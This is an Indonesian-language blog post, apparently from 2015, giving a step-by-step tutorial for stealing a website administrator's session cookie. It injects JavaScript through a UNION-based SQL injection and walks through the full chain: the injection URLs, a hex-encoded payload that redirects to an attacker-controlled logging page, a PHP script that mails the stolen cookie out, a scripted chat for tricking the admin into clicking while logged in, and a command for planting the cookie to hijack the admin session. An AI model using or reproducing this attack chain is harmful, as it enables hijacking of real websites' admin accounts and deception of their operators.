Cookie Stealing over SQL Injection

Oleh chmood

Selasa, September 22, 2015 Rabu, November 11, 2015

dari SQLInjection kita bisa mencuri cookies dari sang admin. benarkah? benar banget.

klo kita sudah dapet username + password, tapi gak bisa decrypt, dan tetep gak bisa masuk, ada baiknya mencoba trik ini.

tekniknya sama persis dengan deface temporer melalui sql.

contoh

www.embuh.php?id=-1+union+select+1,2,3,4,5--
trus yang keluar adalah angga 3. maka kita inject di angka 3 tersebut. apa yang di inject? bukan command sql, tetapi javascript kayak gini:

<script>window.location=\"http://www.site-attacker.com/log-xss.php?cookie=document.cookie\";</script>
so, kayak gini:

www.embuh.php?id=-1+union+select+1,2,\'<script>window.location=\"http://www.site-attacker.com/log-xss.php?cookie=document.cookie+\'\\nsite:www.embuh.com\'\";</script>\',4,5--
kemudian coba. pasti error. hehehe. maka, kita harus mengenkripsinya kedalam hexa biar bisa dibaca oleh mysql.
convertnya disini:

http://tools.explorecrew.org/enc-dec.php?cat=enc
masukin tuh javascript. hasilnya kayak gini:

266c743b7363726970742667743b77696e646f772e6c6f636174696f6e3d5c2671756f743b687474703a2f2f7777772e736974652d61747461636b65722e636f6d2f6c6f672d7873732e7068703f636f6f6b69653d646f63756d656e742e636f6f6b69655c2671756f743b3b266c743b2f7363726970742667743b

nah, trus masukin ke injeksi sql. jangan lupa di depanya kasih 0x. jadinya kayak gini (ini hanya contoh, sesuaikan dgn kebutuhan):

www.embuh.php?id=-1+union+select+1,2,0x266c743b7363726970742667743b77696e646f772e6c6f636174696f6e3d5c2671756f743b687474703a2f2f7777772e736974652d61747461636b65722e636f6d2f6c6f672d7873732e7068703f636f6f6b69653d646f63756d656e742e636f6f6b69655c2671756f743b3b266c743b2f7363726970742667743b,4,5--

buat ngelog filenya, cukup gini aja:

log-xss.php

$email = \"[email protected]\";
$headers = \"From: [email protected]\\r\\n\" .
\"Reply-To: [email protected]\\r\\n\" .
\"X-Mailer: PHP/\".phpversion();

$isi = $_GET[cookie];

@mail($email, \"cookie log\", $isi, $headers);

//jangan lupa redirek ke siet sasaran lagi
header(\"location: http://www.embuh.com\");

nah, trus maen soceng sedikit ke admin, kirim email ke admin ato ngechat via fb/ym/apa aja deh yg penting sampe ke si admin.

A <- aq
M <- mimin

A: hay min...
M: halo bro
A: ada bug tuh di site ente
M: masa sih. coba mana buktinya
A: di bilangin kok gak percaya. coba situ login admin <--- suruh admin login dulu. kan kita mau nyuri cookie nya dia.
M: iya ini udah login
A: nah, coba u buka nih link, keliatan jelas banget ada bug di site ente
A: nih: [url yg tadi udah di injeksi]
M: oke deh. tekape
M: eh kok ngeblank ya? redirek ke halaman laen gitu
A: y ntuh bug nye. segera y perbaiki ya
M: oke deh. tengkiyu :* <--- admin nya agak maho

cookie akan terkirim ke email. buka cookie. misal dapetnya kayak gini:
dlfkjslfkjs984ry09dlskfjdslfjdsfds;fldskfljdsflkjdskl

buka site sasaran. lalu dengan sedikit javascript injection, masukkan cookie ke browser.

javascript:void(document.cookie=\"dlfkjslfkjs984ry09dlskfjdslfjdsfds;fldskfljdsflkjdskl\");

ato dengan tool cookie setter yg u punya deh.

trus buka halaman admin nya. dan, selamat menikmati... :)

Category

Exploitations

Komentar

Postingan Lebih Baru Postingan Lama